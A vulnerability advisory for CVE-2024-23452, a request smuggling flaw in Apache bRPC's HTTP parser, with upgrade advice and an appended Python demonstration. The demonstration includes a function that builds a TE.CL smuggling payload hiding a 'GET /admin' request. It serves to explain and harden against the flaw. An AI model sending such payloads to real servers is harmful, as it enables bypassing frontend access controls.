Hongpei Li

#32305 of 53,635
7.8 Total CVSS
Vulnerabilities · 1
PT-2024-1633
7.8
2024-01-17
Apache · Apache Brpc · CVE-2024-23452
**Name of the Vulnerable Software and Affected Versions**

Apache bRPC versions 0.9.5 through 1.7.0.

**Description**

The HTTP parser in bRPC does not comply with RFC 7230 (HTTP/1.1 message syntax), specifically its rule for messages that carry both a `Transfer-Encoding` and a `Content-Length` header field. RFC 7230 section 3.3.3 requires `Transfer-Encoding` to take precedence and `Content-Length` to be ignored in that case; bRPC does not give it that precedence. When a bRPC-based HTTP server on the backend receives requests over a persistent connection from a frontend server that frames requests by `Transfer-Encoding`, the two parsers disagree on where one request's body ends and the next request begins, so an attacker can smuggle a request into the backend connection. This can be used for request smuggling or response splitting attacks.

**Recommendations**

For Apache bRPC versions 0.9.5 through 1.7.0, upgrade to version 1.8.0, which fixes this issue. As a temporary workaround, apply the patch available at https://github.com/apache/brpc/pull/2518 to mitigate the risk of exploitation. Independently of the bRPC version, a front-end proxy should reject, or strip `Content-Length` from, requests that carry both header fields; RFC 7230 section 3.3.3 requires a sender to remove `Content-Length` before forwarding such a message.
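The desync described above, shown as an added worked example that is not part of the advisory or of bRPC's own C++ parser. It assumes a toy HTTP/1.1 request framer in Python with three framing policies: the RFC 7230 rule (Transfer-Encoding wins), the non-compliant rule (Content-Length wins), and a strict mode that rejects messages carrying both. The request bytes are constructed for the example; the backend name and paths are hypothetical. Framing the same byte stream with the first two policies yields one request on the frontend and two on the backend, which is exactly the disagreement an attacker needs.

```python
"""Toy HTTP/1.1 request framer illustrating a Transfer-Encoding /
Content-Length desync (added example, not bRPC code)."""

CRLF = b"\r\n"


def parse_head(buf, start):
    """Parse the request line and headers beginning at `start`.

    Returns (request_line, headers, body_start) or None if the head
    is incomplete. Header names are lower-cased; repeats are joined.
    """
    end = buf.find(CRLF + CRLF, start)
    if end < 0:
        return None
    lines = buf[start:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + "," + value
    return lines[0], headers, end + 4


def read_chunked(buf, pos):
    """Consume a chunked body starting at pos; return (body, next_pos)."""
    body = b""
    while True:
        line_end = buf.find(CRLF, pos)
        if line_end < 0:
            raise ValueError("truncated chunk-size line")
        size = int(buf[pos:line_end].split(b";", 1)[0].strip(), 16)
        pos = line_end + 2
        if size == 0:
            # last chunk: skip any trailer fields up to the empty line
            while True:
                line_end = buf.find(CRLF, pos)
                if line_end < 0:
                    raise ValueError("truncated trailer")
                line, pos = buf[pos:line_end], line_end + 2
                if not line:
                    return body, pos
        body += buf[pos:pos + size]
        pos += size
        if buf[pos:pos + 2] != CRLF:
            raise ValueError("missing chunk terminator")
        pos += 2


def split_requests(buf, framing):
    """Split a byte stream into (request_line, body) tuples.

    framing: "te-first"  RFC 7230 s3.3.3: Transfer-Encoding overrides CL
             "cl-first"  non-compliant: Content-Length is honoured first
             "strict"    reject a message that carries both fields
    """
    requests, pos = [], 0
    while pos < len(buf):
        while buf[pos:pos + 2] == CRLF:  # tolerate empty lines between requests
            pos += 2
        parsed = parse_head(buf, pos)
        if parsed is None:
            break
        request_line, headers, pos = parsed
        te, cl = headers.get("transfer-encoding"), headers.get("content-length")
        chunked = te is not None and "chunked" in te.lower()
        if framing == "strict" and te is not None and cl is not None:
            raise ValueError("both Transfer-Encoding and Content-Length present")
        if (framing == "cl-first" and cl is not None) or (not chunked and cl is not None):
            n = int(cl)
            body, pos = buf[pos:pos + n], pos + n
        elif chunked:
            body, pos = read_chunked(buf, pos)
        else:
            body = b""
        requests.append((request_line, body))
    return requests


# Constructed smuggled request. Its Content-Length: 7 absorbs the
# "\r\n0\r\n\r\n" that terminates the outer chunked body, so the
# backend sees a clean second request rather than trailing junk.
SMUGGLED = (
    b"GET /admin HTTP/1.1\r\n"
    b"Host: backend\r\n"
    b"Content-Length: 7\r\n"
    b"\r\n"
)


def build_te_cl_payload(smuggled=SMUGGLED):
    """Outer request whose Content-Length covers only the chunk-size line,
    so a CL-framing backend stops there and treats the chunk data as the
    start of the next request."""
    size_line = b"%x\r\n" % len(smuggled)
    head = (
        b"POST /upload HTTP/1.1\r\n"
        b"Host: frontend\r\n"
        + b"Content-Length: %d\r\n" % len(size_line)
        + b"Transfer-Encoding: chunked\r\n\r\n"
    )
    return head + size_line + smuggled + b"\r\n0\r\n\r\n"


def demo():
    """Return how each framing policy splits the same byte stream."""
    payload = build_te_cl_payload()
    return {
        "frontend (te-first)": [r[0] for r in split_requests(payload, "te-first")],
        "backend (cl-first)": [r[0] for r in split_requests(payload, "cl-first")],
    }


if __name__ == "__main__":
    for role, seen in demo().items():
        print(role, "->", seen)
```

The frontend, honouring `Transfer-Encoding`, forwards one `POST /upload`; the backend, honouring `Content-Length`, reads the same bytes as `POST /upload` followed by `GET /admin`. The `strict` policy is the hardening a fixed parser or a front-end proxy should apply: refuse the ambiguous message instead of picking a side.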